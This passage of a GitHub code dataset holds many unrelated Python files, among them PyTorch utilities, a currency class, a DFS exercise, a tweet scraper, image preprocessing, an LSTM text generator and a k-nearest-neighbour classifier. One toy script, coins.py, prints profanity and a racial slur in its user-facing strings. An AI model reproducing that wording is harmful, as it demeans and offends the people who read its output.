nn.init.trunc_normal_(w)\n \"\"\"\n return _no_grad_trunc_normal_(tensor, mean, std, a, b)\n\ndef get_current_git_hash():\n try:\n from git.repo import Repo\n from git import InvalidGitRepositoryError\n except ImportError:\n return None\n try:\n repo = Repo(search_parent_directories=True)\n return repo.head.object.hexsha\n except InvalidGitRepositoryError:\n return None","repo_name":"lidotcircle/PatchAttnNCE","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71219254245","text":"def coinsFunct():\n coins = 0\n print('You have %d coins.' % (coins))\n another = input('Do you want another?: ').lower()\n while another == 'yes':\n coins += 1\n print('You have %d coins.' % (coins))\n if another == 'yes':\n another = input('Do you want another?: ')\n else:\n print('')\n print('Well fuck you then, nigga.') \n\n\"\"\"\n#here's a simpler way:\ncoins = 0 \nanother = \"yes\"\n\nwhile another == \"yes\":\n print(\"You have %d coins\" % coins)\n another = input(\"You want another, nigga?:\").lower()\n coins = coins + 1\n\nprint(\"Peace, bih.\")\n\"\"\"","repo_name":"jalani2727/SAfunctions","sub_path":"coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72456034086","text":"import abc\r\nimport logging\r\nfrom collections.abc import Mapping\r\nfrom enum import Enum\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass AppField(str, Enum):\r\n DATA = 'data'\r\n PERIOD = 'period'\r\n CBR = 'cbr'\r\n\r\n\r\nclass Curr(str, Enum):\r\n RUB = 'rub'\r\n EUR = 'eur'\r\n USD = 'usd'\r\n\r\n\r\nclass CurrencyField(abc.ABC):\r\n \"\"\"Дескриптор для валидации валют\"\"\"\r\n\r\n def __set_name__(self, owner, name):\r\n self.name = name\r\n\r\n def __set__(self, instance, value):\r\n try:\r\n new_value = self.validate(self.name, value)\r\n instance.__dict__[self.name] = new_value\r\n except ValueError:\r\n logger.error(f'{self.name} must be > 0.')\r\n\r\n def validate(self, name: str, value: float | str) -> float:\r\n if isinstance(value, str):\r\n value = float(value.replace(',', '.'))\r\n value = round(value, 2)\r\n if value < 0:\r\n raise ValueError\r\n return value\r\n\r\n\r\nclass BaseCurrency(abc.ABC):\r\n rub = CurrencyField()\r\n eur = CurrencyField()\r\n usd = CurrencyField()\r\n\r\n def __repr__(self):\r\n return f'Currency(rub={self.rub}, usd={self.usd}, eur={self.eur})'\r\n\r\n @abc.abstractmethod\r\n def from_dict(self, json_data):\r\n \"\"\"Загрузить из словаря\"\"\"\r\n\r\n @abc.abstractmethod\r\n def was_updated(self):\r\n \"\"\"Проверить обновления объекта\"\"\"\r\n\r\n\r\nclass Currency(BaseCurrency):\r\n def __repr__(self):\r\n return f'Currency(rub={self.rub}, usd={self.usd}, eur={self.eur})'\r\n\r\n def __iter__(self):\r\n return (i for i in (self.rub, self.eur, self.usd))\r\n\r\n def __init__(self, rub=0, eur=0, usd=0):\r\n self.rub = rub\r\n self.eur = eur\r\n self.usd = usd\r\n self.__updated = False\r\n\r\n @property\r\n def updated(self):\r\n return self.__updated\r\n\r\n def __eq__(self, other):\r\n return (\r\n self.rub == other.rub\r\n and self.usd == other.usd\r\n and self.eur == other.eur\r\n )\r\n\r\n def __hash__(self):\r\n return hash(self.rub + self.usd + self.eur)\r\n\r\n def __add__(self, other: Mapping):\r\n old_hach = hash(self)\r\n if isinstance(other, Currency):\r\n self.rub = self.rub + other.rub\r\n self.eur = self.eur + other.eur\r\n self.usd = self.usd + other.usd\r\n else:\r\n try:\r\n self.rub += float(other.get(Curr.RUB, 0))\r\n self.eur += float(other.get(Curr.EUR, 0))\r\n self.usd += float(other.get(Curr.USD, 0))\r\n except TypeError:\r\n logger.error('Required object Currency')\r\n self.__updated = hash(self) != old_hach\r\n return self\r\n\r\n def from_dict(self, json_data: Mapping):\r\n old_hach = hash(self)\r\n self.rub = json_data.get(Curr.RUB, self.rub)\r\n self.eur = json_data.get(Curr.EUR, self.eur)\r\n self.usd = json_data.get(Curr.USD, self.usd)\r\n self.__updated = hash(self) != old_hach\r\n return self\r\n\r\n def was_updated(self):\r\n if self.__updated:\r\n self.__updated = False\r\n return True\r\n return False\r\n","repo_name":"fennr/ujin-app","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31096893651","text":"N=int(input())\nM=int(input())\nV=1\n\ndef dfs(c):\n ans_dfs.append(c) #방문 노드 추가\n visted[c]=1 #방문 표시\n\n for n in adj[c]:\n if not visted[n]:\n dfs(n)\n\nadj=[[] for _ in range(N+1)]\nfor _ in range(M):\n s, e = map(int, input().split())\n adj[s].append(e)\n adj[e].append(s) # 양방향\n\n# [1] 오름차순 정렬\nfor i in range(1, N+1):\n adj[i].sort()\n\nvisted = [0]*(N+1)\nans_dfs = []\ndfs(V)\n\n\nprint(len(ans_dfs)-1)","repo_name":"ssum21/BEAKJOON","sub_path":"2606.py","file_name":"2606.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30976233695","text":"# https://deeplearningcourses.com/c/deep-learning-gans-and-variational-autoencoders\n# https://www.udemy.com/deep-learning-gans-and-variational-autoencoders\nfrom __future__ import print_function, division\nfrom builtins import range, input\n# Note: you may need to update your version of future\n# sudo pip install -U future\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal as mvn\n\n\ndef softplus(x):\n # log1p(x) == log(1 + x)\n return np.log1p(np.exp(x))\n\n\n# we're going to make a neural network\n# with the layer sizes (4, 3, 2)\n# like a toy version of a encoder\n\nW1 = np.random.randn(4, 3)\nW2 = np.random.randn(3, 2*2)\n\n# why 2 * 2?\n# we need 2 components for the mean,\n# and 2 components for the standard deviation!\n\n# ignore bias terms for simplicity.\n\ndef forward(x, W1, W2):\n hidden = np.tanh(x.dot(W1))\n output = hidden.dot(W2) # no activation!\n mean = output[:2]\n stddev = softplus(output[2:])\n return mean, stddev\n\n\n# make a random input\nx = np.random.randn(4)\n\n# get the parameters of the Gaussian\nmean, stddev = forward(x, W1, W2)\nprint(\"mean:\", mean)\nprint(\"stddev:\", stddev)\n\n# draw samples\nsamples = mvn.rvs(mean=mean, cov=stddev**2, size=10000)\n\n# plot the samples\nplt.scatter(samples[:,0], samples[:,1], alpha=0.5)\nplt.show()\n\n\n","repo_name":"lazyprogrammer/machine_learning_examples","sub_path":"unsupervised_class3/parameterize_guassian.py","file_name":"parameterize_guassian.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":7794,"dataset":"github-code","pt":"52"} +{"seq_id":"12860896582","text":"\n\n# 1.12 Determining the most frequently ocurring tems in a sequence\n\nfrom collections import Counter\n\nwords = [\n 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n 'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n 'my', 'eyes', \"you're\", 'under'\n]\n\nword_counts = Counter(words)\nprint(word_counts)\n\ntop_three = word_counts.most_common(3)\nprint(top_three)\n\n# number of ocurrences\nprint(word_counts['not'])\nprint(word_counts['eyes'])\n\n# incrementing counts manually\nmore_words = 'why are you not looking in my eyes'.split(' ')\nfor word in more_words:\n word_counts[word] += 1\n\nprint(word_counts['not'])\nprint(word_counts['eyes'])\n\n# another example | using `update` method\nword_counts.update(more_words)\nprint(word_counts)\n\n# another example | combining Counter's\na = Counter(words)\nb = Counter(more_words)\nprint(a)\nprint(b)\n\nc = a + b # adding\nprint(c)\n\nd = a - b # substracting\nprint(d)\n","repo_name":"Roderich25/mac","sub_path":"python_cookbook/chapter_01/cookbook_12.py","file_name":"cookbook_12.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72232656484","text":"import tensorflow.compat.v1 as tf\nimport model\nimport cv2\nfrom subprocess import call\nimport os\n\nwindows = False\nif os.name == \"nt\":\n windows = True\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nsaver.restore(sess, './save/model.ckpt')\nimg = cv2.imread('./steering_wheel_image.jpg',0)\nrows, cols = img.shape\n\nsmoothed_angle = 0\n\ncap =cv2.VideoCapture(0)\nwhile(cv2.waitKey(10) != ord('q')):\n ret, frame = cap.read()\n image = cv2.resize(frame, (200, 66))/255.0\n degrees = model.y.eval(feed_dict = {model.x: [image], model.keep_prob:1.0})[0][0] * 180/3.14159265\n if not windows:\n call('clear')\n print(\"Predicted steering angle : \" + str(degrees) + \"degrees\")\n cv2.imshow('frame', frame)\n\n smoothed_angle += 0.2*pow(abs((degrees - smoothed_angle)),2.0/3.0) *(degrees - smoothed_angle)/ abs(degrees - smoothed_angle)\n M = cv2.getRotationMatrix2D((cols/2, rows/2), -smoothed_angle,1)\n dst = cv2.warpAffine(img, M, (cols, rows))\n cv2.imshow(\"steering wheel\", dst)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"khuchuuanh/Deeplearning","sub_path":"Driving_car/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"35453690184","text":"# Remember to run pip install GetOldTweets3 in terminal\nimport GetOldTweets3 as got\nimport csv\nimport numpy as np\nimport datetime as dt\nimport pandas as pd\n\n# Needed variable used like this: setMaxTweets(maxTweets)\n# I assume it will attempt to run forever without this criterion\nmaxTweets = 1000\n\n# Need username or search variable at least\n# Possible variable used like this: setUsername(username)\n# username = 'realDonaldTrump'\n\n# Possible variable used like this: setQuerySearch(search)\nsearch = 'coronavirus'\n\nuntilDate = dt.date.today() + dt.timedelta(1)\nuntilDate = untilDate.strftime(\"%Y-%m-%d\")\n\ntweetTextList = []\ntweetDateList = []\n\nnumDays = 80\ni = 1\nuntilDate = dt.date.today() + dt.timedelta(i)\nwhile i <= numDays:\n untilDate = untilDate.strftime(\"%Y-%m-%d\")\n\n tweetCriteria = got.manager.TweetCriteria().setTopTweets(True) \\\n .setQuerySearch(search).setMaxTweets(maxTweets) \\\n .setSince(\"2020-02-01\").setUntil(untilDate)\n tweets = got.manager.TweetManager.getTweets(tweetCriteria);\n\n untilDate = dt.date.today() - dt.timedelta(i)\n i += 1\n for tweet in tweets:\n tweetTextList.append(tweet.text)\n tweetDateList.append(tweet.date)\n\ndfTweets = pd.DataFrame(list(zip(tweetDateList, tweetTextList)))\n\n\n# Using pandas library, it's better\ndfTweets.to_csv('finalTweets.csv', sep=',', encoding='utf-8')\n","repo_name":"marcdlc56/INFO3700FinalProject","sub_path":"GetOldTweets.py","file_name":"GetOldTweets.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888780324","text":"import glob, csv, os\nimport numpy as np\nimport cPickle as pickle\n\ndef loadScioDataset(pklFile='sciodata', csvFile='scio_allmaterials_clean', materialNames=[], objectNames=[]):\n saveFilename = os.path.join('data', pklFile + '.pkl')\n if os.path.isfile(saveFilename):\n with open(saveFilename, 'rb') as f:\n X, y_materials, y_objects, wavelengths = pickle.load(f)\n else:\n X = []\n y_materials = []\n y_objects = []\n filename = os.path.join('data', csvFile + '.csv')\n wavelengthCount = 331\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i < 10 or i == 11:\n continue\n if i == 10:\n # Header row\n wavelengths = [float(r.strip().split('_')[-1].split()[0]) + 740.0 for r in row[10:wavelengthCount+10]]\n continue\n obj = row[3].strip()\n material = row[4].strip()\n if material not in materialNames:\n continue\n index = materialNames.index(material)\n if obj not in objectNames[index]:\n continue\n values = [float(v) for v in row[10:wavelengthCount+10]]\n X.append(values)\n y_materials.append(index)\n y_objects.append(obj)\n\n with open(saveFilename, 'wb') as f:\n pickle.dump([X, y_materials, y_objects, wavelengths], f, protocol=pickle.HIGHEST_PROTOCOL)\n return X, y_materials, y_objects, wavelengths\n\ndef firstDeriv(x, wavelengths):\n # First derivative of measurements with respect to wavelength\n x = np.copy(x)\n for i, xx in enumerate(x):\n dx = np.zeros(xx.shape, np.float)\n dx[0:-1] = np.diff(xx)/np.diff(wavelengths)\n dx[-1] = (xx[-1] - xx[-2])/(wavelengths[-1] - wavelengths[-2])\n x[i] = dx\n return x\n\n\n","repo_name":"lnairGT/Robogyver-Tool-Macgyvering","sub_path":"training-models/material-predict/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32401548934","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# defining global variable path\nimage_path = \"C:/Users/eddie/Documents/233-drucker-pc1_200709170002\"\n\noutput = \"C:/Users/eddie/Documents/HealthyUnhealthyClassifier/data/XCL_NPC_2_3/train_set/\"\n\n'''function to load folder into arrays and \nthen it returns that same array'''\ndef loadImages(path):\n\t# Put files into lists and return them as one list of size 4\n\timage_files = sorted([os.path.join(path, file)\n\t\tfor file in os.listdir(path) if \"d0.TIF\" in file])\n \n\treturn image_files\n\n\n# Display one image\ndef display_one(a, title1 = \"Original\"):\n\tplt.imshow(a), plt.title(title1)\n\tplt.xticks([]), plt.yticks([])\n\tplt.show()\n\n# Display two images\ndef display(a, b, title1 = \"Original\", title2 = \"Edited\"):\n\tplt.subplot(121), plt.imshow(a), plt.title(title1)\n\tplt.xticks([]), plt.yticks([])\n\tplt.subplot(122), plt.imshow(b), plt.title(title2)\n\tplt.xticks([]), plt.yticks([])\n\tplt.show()\n\n# Preprocessing\ndef processing(data):\n\t# loading image\n\t\n\tprint('Original size',cv2.imread(data[0]).shape)\n\n\t#res_img = []\n\n\tfor i, img in enumerate(data):\n\t\ttry:\n\n\t\t\tbase = os.path.basename(img)\n\n\t\t\twell = base[-11:-9]\n\n\t\t\twt = True if int(well) <=6 else False\n\n\t\t\tch0 = cv2.cvtColor(cv2.imread(img),cv2.COLOR_BGR2GRAY)\n\t\t\tch1 = cv2.cvtColor(cv2.imread(img.replace(\"d0\", \"d1\")),cv2.COLOR_BGR2GRAY)\n\t\t\tch2 = cv2.cvtColor(cv2.imread(img.replace(\"d0\", \"d2\")),cv2.COLOR_BGR2GRAY)\n\t\t\tmerge = np.zeros((ch0.shape[0], ch0.shape[1], 3))\n\n\t\t\tmerge [:,:,0] = ch1\n\t\t\tmerge [:,:,1] = ch2\n\t\t\tmerge [:,:,2] = ch2\n\n\t\t\t# --------------------------------\n\t\t\t# setting dim of the resize\n\t\t\theight = 128\n\t\t\twidth = 128\n\n\t\t\tmargin = 34\n\n\t\t\tdim = (width, height)\n\n\t\t\tres = cv2.resize(merge, dim, interpolation=cv2.INTER_LINEAR)\n\n\t\t\t#cv2.imwrite(output + str(i) + \"A.png\", res)\n\n\t\t\tres = res[margin:-margin, margin:-margin]\n\n\t\t\t#cv2.imwrite(output + str(i) + \"B.png\", res)\n\n\t\t\t# normalize\n\n\t\t\tres = cv2.normalize(res, res, 0, 255, cv2.NORM_MINMAX)\n\n\t\t\t#cv2.imwrite(output + str(i) + \"C.png\", res)\n\n\t\t\t#res_img.append(res)\n\n\t\t\tif wt:\n\t\t\t\tcv2.imwrite(output + \"healthy/\"+ os.path.splitext(base)[0] + \".png\", res)\n\t\t\telse:\n\t\t\t\tcv2.imwrite(output + \"unhealthy/\"+ os.path.splitext(base)[0] + \".png\", res)\n\n\t\texcept Exception as e:\n\t\t\tprint()\n\t\t\tprint(\"Exception occured with following : \" + img)\n\t\t\tprint(repr(e))\n\n\ndef main():\n\t# calling global variable\n\tglobal image_path\n\t'''The var Dataset is a list with all images in the folder ''' \n\tdataset = loadImages(image_path)\n\n\tprint(\"List of files the first 3 in the folder:\\n\",dataset[:3])\n\tprint(\"--------------------------------\")\n\n\t# sending all the images to pre-processing\n\tpro = processing(dataset)\n\n\n\nmain()","repo_name":"CaiEddie/HealthyUnhealthyClassifier","sub_path":"preprocessing/preprocessing_original.py","file_name":"preprocessing_original.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21896488304","text":"import numpy\nimport tensorflow\nimport glob\nimport codecs\nimport pickle\nimport time\nimport os\nimport datetime\nimport language_check\ntensorflow.logging.set_verbosity(tensorflow.logging.INFO)\n\n\ndef create_lookup_tables(text):\n \"\"\"\n Create lookup tables for vocabulary\n :param text: The text from the books split into words\n :return: A tuple of dicts\n \"\"\"\n vocabulary = set(text)\n int_to_vocab = {key: word for key, word in enumerate(vocabulary)}\n vocab_to_int = {word: key for key, word in enumerate(vocabulary)}\n return vocab_to_int, int_to_vocab\n\n\ndef token_lookup():\n \"\"\"\n Generate a dict to map punctuation into a token\n :return: dictionary mapping punctuation to token\n \"\"\"\n return {\n '.': '||period||',\n ',': '||comma||',\n '\"': '||quotes||',\n ';': '||semicolon||',\n '!': '||exclamation-mark||',\n '?': '||question-mark||',\n '(': '||left-parentheses||',\n ')': '||right-parentheses||',\n '--': '||emm-dash||',\n '\\n': '||return||'\n }\n\n\ndef get_batches(int_text, batch_size, seq_length):\n \"\"\"\n Return batches of input and target data\n :param int_text: text with words replaced by their ids\n :param batch_size: the size that each batch of data should be\n :param seq_length: the length of each sequence\n :return: batches of data as a numpy array\n \"\"\"\n words_per_batch = seq_length * batch_size\n num_batches = len(int_text)//words_per_batch\n if num_batches == 0:\n num_batches = 1\n int_text = int_text[:num_batches * words_per_batch]\n y = numpy.array(int_text[1:] + [int_text[0]])\n x = numpy.array(int_text)\n\n x_batches = numpy.split(x.reshape(batch_size, -1), num_batches, axis=1)\n y_batches = numpy.split(y.reshape(batch_size, -1), num_batches, axis=1)\n\n batch_data = list(zip(x_batches, y_batches))\n\n return numpy.array(batch_data)\n\n\ndef pick_word(probabilities, int_to_vocab):\n \"\"\"\n Pick the next word with some randomness\n :param probabilities: Probabilites of the next word\n :param int_to_vocab: Dictionary of word ids as the keys and words as the\n values\n :return: String of the predicted word\n \"\"\"\n return numpy.random.choice(\n list(int_to_vocab.values()), 1, p=probabilities)[0]\n\n\ndef process_and_save(prime_words):\n batch_size = 128\n rnn_size = 1536\n num_layers = 3\n keep_prob = 0.78\n embed_dim = 1536\n seq_length = 16\n learning_rate = 0.001\n gen_length = 6000\n\n version_dir = './ai_origin'\n\n save_dir = os.path.abspath('save')\n\n book_files = sorted(glob.glob(\"data/*.txt\"))\n\n print('found {} books'.format(len(book_files)))\n corpus_raw = u\"\"\n for file in book_files:\n with codecs.open(file, 'r', encoding='utf-8') as book_file:\n corpus_raw += book_file.read()\n print('Corpus is {} words long'.format(len(corpus_raw)))\n\n token_dict = token_lookup()\n for token, replacement in token_dict.items():\n corpus_raw = corpus_raw.replace(token, ' {} '.format(replacement))\n corpus_raw = corpus_raw.lower()\n corpus_raw = corpus_raw.split()\n vocab_to_int, int_to_vocab = create_lookup_tables(corpus_raw)\n corpus_int = [vocab_to_int[word] for word in corpus_raw]\n pickle.dump((corpus_int, vocab_to_int, int_to_vocab, token_dict),\n open('preprocess.p', 'wb'))\n\n train_graph = tensorflow.Graph()\n with train_graph.as_default():\n # Initialize input placeholders\n input_text = tensorflow.placeholder(tensorflow.int32, [None, None],\n name='input')\n targets = tensorflow.placeholder(tensorflow.int32, [None, None],\n name='targets')\n lr = tensorflow.placeholder(tensorflow.float32, name='learning_rate')\n\n # Calculate text attributes\n vocab_size = len(int_to_vocab)\n input_text_shape = tensorflow.shape(input_text)\n\n # Build the RNN cell\n lstm = tensorflow.contrib.rnn.BasicLSTMCell(num_units=rnn_size)\n drop_cell = tensorflow.contrib.rnn.DropoutWrapper(\n lstm, output_keep_prob=keep_prob)\n cell = tensorflow.contrib.rnn.MultiRNNCell([drop_cell] * num_layers)\n\n # Set the initial state\n initial_state = cell.zero_state(input_text_shape[0],\n tensorflow.float32)\n initial_state = tensorflow.identity(initial_state,\n name='initial_state')\n\n # Create word embedding as input to RNN\n embed = tensorflow.contrib.layers.embed_sequence(input_text,\n vocab_size,\n embed_dim)\n\n # Build RNN\n outputs, final_state = tensorflow.nn.dynamic_rnn(\n cell, embed, dtype=tensorflow.float32)\n final_state = tensorflow.identity(final_state, name='final_state')\n\n # Take RNN output and make logits\n logits = tensorflow.contrib.layers.fully_connected(outputs, vocab_size,\n activation_fn=None)\n\n # Calculate the probability of generating each word\n _ = tensorflow.nn.softmax(logits, name='probs')\n\n # Define loss function\n cost = tensorflow.contrib.seq2seq.sequence_loss(\n logits,\n targets,\n tensorflow.ones([input_text_shape[0], input_text_shape[1]])\n )\n\n # Learning rate optimizer\n optimizer = tensorflow.train.AdamOptimizer(learning_rate)\n\n # Gradient clipping to avoid exploding gradients\n gradients = optimizer.compute_gradients(cost)\n capped_gradients = [(tensorflow.clip_by_value(grad, -1., 1.), var) for\n grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)\n\n pickle.dump((seq_length, save_dir), open(save_dir+'/'+'params.p', 'wb'))\n batches = get_batches(corpus_int, batch_size, seq_length)\n start_time = time.time()\n train_loss = 100\n epoch = 0\n batch_index = 0\n with tensorflow.Session(graph=train_graph) as sess:\n sess.run(tensorflow.global_variables_initializer())\n\n while epoch < 50:\n epoch += 1\n state = sess.run(initial_state, {input_text: batches[0][0]})\n\n for batch_index, (x, y) in enumerate(batches):\n feed_dict = {\n input_text: x,\n targets: y,\n initial_state: state,\n lr: learning_rate\n }\n train_loss, state, _ = sess.run(\n [cost, final_state, train_op], feed_dict)\n\n time_elapsed = time.time() - start_time\n print(\n 'Epoch {:>3} Batch {:>4}/{} train_loss = {:.3f} '\n 'time_elapsed = {:.3f}'.format(\n epoch,\n batch_index + 1,\n len(batches),\n train_loss,\n time_elapsed))\n\n # save model every 5 epochs\n if epoch % 5 == 0:\n saver = tensorflow.train.Saver()\n saver.save(sess, save_dir)\n print('Model Trained and Saved')\n\n corpus_int, vocab_to_int, int_to_vocab, token_dict = pickle.load(\n open('preprocess.p', mode='rb'))\n seq_length, save_dir = pickle.load(open(\n save_dir+'/'+'params.p', mode='rb'))\n\n loaded_graph = tensorflow.Graph()\n\n with tensorflow.Session(graph=loaded_graph) as sess:\n # Load the saved model\n loader = tensorflow.train.import_meta_graph(save_dir + '.meta')\n loader.restore(sess, save_dir)\n\n # Get tensors from loaded graph\n input_text = loaded_graph.get_tensor_by_name('input:0')\n initial_state = loaded_graph.get_tensor_by_name('initial_state:0')\n final_state = loaded_graph.get_tensor_by_name('final_state:0')\n probs = loaded_graph.get_tensor_by_name('probs:0')\n\n # Sentences generation setup\n gen_sentences = prime_words.split()\n prev_state = sess.run(initial_state, {\n input_text: numpy.array([[1 for _ in gen_sentences]])})\n\n # Generate sentences\n for n in range(gen_length):\n # Dynamic Input\n dyn_input = [\n [vocab_to_int[word] for word in gen_sentences[-seq_length:]]]\n dyn_seq_length = len(dyn_input[0])\n\n # Get Prediction\n probabilities, prev_state = sess.run(\n [probs, final_state],\n {input_text: dyn_input, initial_state: prev_state})\n\n pred_word = pick_word(probabilities[dyn_seq_length - 1],\n int_to_vocab)\n\n gen_sentences.append(pred_word)\n\n # Remove tokens\n chapter_text = ' '.join(gen_sentences)\n for key, token in token_dict.items():\n chapter_text = chapter_text.replace(' ' + token.lower(), key)\n\n # print(chapter_text)\n\n chapter_text = ' '.join(gen_sentences)\n for key, token in token_dict.items():\n chapter_text = chapter_text.replace(' ' + token.lower(), key)\n chapter_text = chapter_text.replace('\\n ', '\\n')\n chapter_text = chapter_text.replace('( ', '(')\n chapter_text = chapter_text.replace(' ”', '”')\n\n if not os.path.exists(version_dir):\n os.makedirs(version_dir)\n\n num_chapters = len([name for name in os.listdir(version_dir) if\n os.path.isfile(os.path.join(version_dir, name))])\n\n tool = language_check.LanguageTool('en-US')\n matches = tool.check(chapter_text)\n chapter_text = language_check.correct(chapter_text, matches)\n\n next_chapter = version_dir + '/chapter-' + str(num_chapters + 1) + '.md'\n with open(next_chapter, \"w\", encoding='utf-8') as text_file:\n text_file.write(chapter_text)\n\n\ndef run():\n start_time = datetime.datetime.now()\n print('Start time: {}'.format(start_time))\n keywords_to_use = ['beginning', 'evolved', 'adapt', 'learn']\n # number of chapters written equals length of keywords\n for keyword in keywords_to_use:\n process_and_save(keyword)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"lagliam/auto-book","sub_path":"create_book.py","file_name":"create_book.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32198141899","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom misc.classification import Classification\nfrom misc.data_point import DataPoint\nfrom metrics.euclidean import Euclidean\nfrom algorithms.nearest_neighbors import NearestNeighbour\nfrom src.misc.sensor import Sensor\nfrom src.prak3.P8_data import P8Data\nfrom src.signals.statistics import Statistics\n\ngehen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/gehen.csv')\n# walking starts not directly. Need to move the series\ngehen_data = gehen_data[gehen_data.Timestamp >= (1492076265800 + 5000)]\n\nhuepfen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/huepfen.csv')\nhuepfen_data = huepfen_data[huepfen_data.Timestamp >= (1492076761760 + 3000)]\n\nruhe_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/ruhe.csv')\n\n# We do not need so many data -> clean up graphs\ngehen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(gehen_data['Timestamp'])\ngehen_data = gehen_data[gehen_data.Timestamp_normalized < 12000]\nruhe_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(ruhe_data['Timestamp'])\nruhe_data = ruhe_data[ruhe_data.Timestamp_normalized < 12000]\n\nhuepfen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(huepfen_data['Timestamp'])\nhuepfen_data = huepfen_data[huepfen_data.Timestamp_normalized < 12000]\n\ngehen_classification = Classification(1.0, \"Gehen\")\nruhe_classification = Classification(2.0, \"Ruhe\")\nhuepfen_classification = Classification(3.0, \"Huepfen\")\n\nplt.figure(figsize=(20, 10))\nplt.scatter(ruhe_data['Timestamp_normalized'], ruhe_data['accelX (m/s^2)'], label='ruhe')\nplt.scatter(gehen_data['Timestamp_normalized'], gehen_data['accelX (m/s^2)'], label='gehen')\nplt.scatter(huepfen_data['Timestamp_normalized'], huepfen_data['accelX (m/s^2)'], label='huepfen')\n\ndata_array = []\nsensors = Sensor.get_sensors()\nfeatures = 1 + len(sensors)\n\nwindow_size = 500 #timestamps\nmoving_size = 200\nwindow_count = int(12000/moving_size)\n\nfor i in range(window_count):\n start = i * moving_size\n end = i * moving_size + window_size\n gehen_range = gehen_data[(gehen_data.Timestamp_normalized >= start)\n & (gehen_data.Timestamp_normalized <= end)]\n ruhe_range = ruhe_data[(ruhe_data.Timestamp_normalized >= start) & (ruhe_data.Timestamp_normalized <= end)]\n huepfen_range = huepfen_data[(huepfen_data.Timestamp_normalized >= start) & (huepfen_data.Timestamp_normalized <= end)]\n gehen_range_stddev = Statistics.get_standard_deviation(gehen_range['accelX (m/s^2)'])\n ruhe_range_stddev = Statistics.get_standard_deviation(ruhe_range['accelX (m/s^2)'])\n huepfen_range_stddev = Statistics.get_standard_deviation(huepfen_range['accelX (m/s^2)'])\n ruhe_features = [ruhe_range_stddev]\n gehen_features = [gehen_range_stddev]\n huepfen_features = [huepfen_range_stddev]\n if features > 1:\n for sensor in sensors:\n ruhe_sensor = ruhe_range[ruhe_range['ID'] == sensor.id]\n gehen_sensor = gehen_range[gehen_range['ID'] == sensor.id]\n huepfen_sensor = huepfen_range[huepfen_range['ID'] == sensor.id]\n gehen_features.append(Statistics.get_standard_deviation(gehen_sensor['accelX (m/s^2)']))\n ruhe_features.append(Statistics.get_standard_deviation(ruhe_sensor['accelX (m/s^2)']))\n huepfen_features.append(Statistics.get_standard_deviation(huepfen_sensor['accelX (m/s^2)']))\n data_array.append(P8Data(i, start, end, ruhe_features, gehen_features, huepfen_features))\n\n\nk = 3\nnearest_neighbours = NearestNeighbour(k, Euclidean(), [gehen_classification, ruhe_classification, huepfen_classification])\n\nteach_ratio = 0.4\nteach_train_limit = int(np.round(teach_ratio * len(data_array)))\n\ntrain_data = []\n# Train\nfor x in range(0, teach_train_limit):\n data = data_array[x]\n train_data.append(DataPoint(data.gehen_features, gehen_classification))\n train_data.append(DataPoint(data.ruhe_features, ruhe_classification))\n train_data.append(DataPoint(data.huepfen_features, huepfen_classification))\n\nnearest_neighbours.train_data(train_data)\n\n# Test\ndetected = [1, 2, 3]\nfor x in range(teach_train_limit, len(data_array)):\n data = data_array[x]\n if nearest_neighbours.predict_data(DataPoint(data.gehen_features, gehen_classification)) != gehen_classification:\n print(\"wrong detection gehen\")\n if nearest_neighbours.predict_data(DataPoint(data.ruhe_features, ruhe_classification)) != ruhe_classification:\n print(\"wrong detection ruhe\")\n if nearest_neighbours.predict_data(DataPoint(data.huepfen_features, huepfen_classification)) != huepfen_classification:\n print(\"wrong detection huepfen\")\n\n\n# Print out\nprint(\"\\n>>> NEAREST NEIGHBOURS 